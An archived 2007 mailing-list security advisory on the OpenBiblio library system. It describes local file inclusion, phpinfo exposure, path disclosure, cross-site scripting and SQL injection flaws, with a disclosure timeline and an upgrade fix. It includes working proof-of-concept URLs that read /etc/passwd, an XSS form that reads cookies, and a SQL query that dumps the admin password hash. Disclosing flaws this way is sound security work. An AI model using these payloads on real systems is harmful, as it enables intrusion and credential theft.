lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <af6679240712271914y42f38d73r5f646a643ce63f0b@mail.gmail.com>
Date: Fri, 28 Dec 2007 04:14:55 +0100
From: "Juan Galiana" <jgaliana@...il.com>
To: bugtraq@...urityfocus.com, bugs@...uritytracker.com, news@...uriteam.com, 
	full-disclosure@...ts.grok.org.uk, vuln@...unia.com, 
	packet@...ketstormsecurity.org
Subject: OpenBiblio 0.5.2-pre4 and prior multiple
	vulnerabilities

 - Security Advisory -



- OpenBiblio 0.5.2-pre4 and prior multiple vulnerabilities -
----------------------------------------------------


Product: OpenBiblio
Version: Version 0.5.2 Prerelease 4 and prior is affected
Url: http://obiblio.sourceforge.net/
Affected by: Full path disclosure, local file include, phpinfo disclosure,
multiple Cross Site Scripting, SQL injection




I. Introduction.

OpenBiblio is an easy to use, automated library system written in PHP
containing OPAC, circulation,
cataloging, and staff administration functionality.
OpenBiblio library administration offers an intuitive interface with broad
category tabs and sidebar.



II. Description


OpenBiblio suffers multiple bugs.




1) Local File Include vulnerability: its posible to include any arbitrary
local file using shared/help.php file

- Code -
if (isset($_GET["page"])) {
     $page = $_GET["page"];
} else {
     $page = "contents";
   }
   include("../locale/".OBIB_LOCALE."/help/".$page.".php");

- PoC -
http://site/openbiblio/shared/help.php?page=../../../../../../etc/passwd%00





2) Local File Include (2) (only works with register_globals On and for non
php files magic_quotes_gpc must be Off)

- Code -
<?php include("../navbars/".$tab.".php");?>

- PoC -
http://site/openbiblio/shared/header.php?tab=../../../etc/passwd%00





3) This link will show phpinfo

http://site/openbiblio/phpinfo.php

Remove it!



4) Path Disclosure

Some samples:

http://site/openbiblio/shared/footer.php
Fatal error: Call to a member function on a non-object in
/httpdocs/openbiblio/shared/footer.php on line 18

http://site/openbiblio/circ/mbr_fields.php
Fatal error: Call to a member function on a non-object in
/httpdocs/openbiblio/circ/mbr_fields.php on line 14


http://site/openbiblio/admin/custom_marc_form_fields.php
Fatal error: Cannot instantiate non-existent class: dmquery in
/httpdocs/openbiblio/admin/custom_marc_form_fields.php on line 14


Please, turn display_errors to Off in php.ini



6) Multiple Cross Site Scripting, an attacker can perform an XSS attack that
allows him to access the targeted user cookies


Some samples:

http://site/openbiblio/admin/staff_del_confirm.php?UID=1&LAST=[XSS]&FIRST=[XSS]

http://site/openbiblio/admin/theme_del_confirm.php?themeid=6&name=[XSS]

In /admin/theme_preview.php an attacker can inject an XSS in the var
themeName with method POST.
here is a poc:


<form action="http://site/openbiblio/admin/theme_preview.php" method="post">
<input type="text" name="themeName" size="40" value="<script>alert(
document.cookie);</script>"><br><br>
<input type="submit" value="doit">
</form>




try with: <script>alert(document.cookie);</script>





6) SQL injection (session with report rol is needed to exploit this bug)


Any user with report rol can access any field of the database, including
admin md5 hash.


http://site/openbiblio/reports/report_criteria.php?reset=Y&rptid=balanceDueList&title=Balance+Due+Member+List&sql=%0A++++[SQL]%0A++

with this an attacker can get the md5 admin password:


http://site/openbiblio/reports/report_criteria.php?reset=Y&rptid=balanceDueList&title=Balance+Due+Member+List&sql=%0A++++select+username,pwd+from+staff%20where+userid=1%0A++

then click "run report" and view the results, besides, you can choose
between html and csv format ;)


staff.username  staff.pwd
admin   21232f297a57a5a743894a0e4a801fc3



III. Timeline

20/08/2006 - Bugs discovered
25/08/2006 - Vendor Contacted
30/08/2006 - Release 0.5.2 (parcial patch)
21/02/2007 - Release 0.6.0 (full patch)
28/12/2007 - Advisory Disclosure




IV. Solution

Upgrade to 0.6.0 from http://obiblio.sourceforge.net/
Good work! :)


V. Credits

Juan Galiana <jgaliana gmail com>


Regards

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ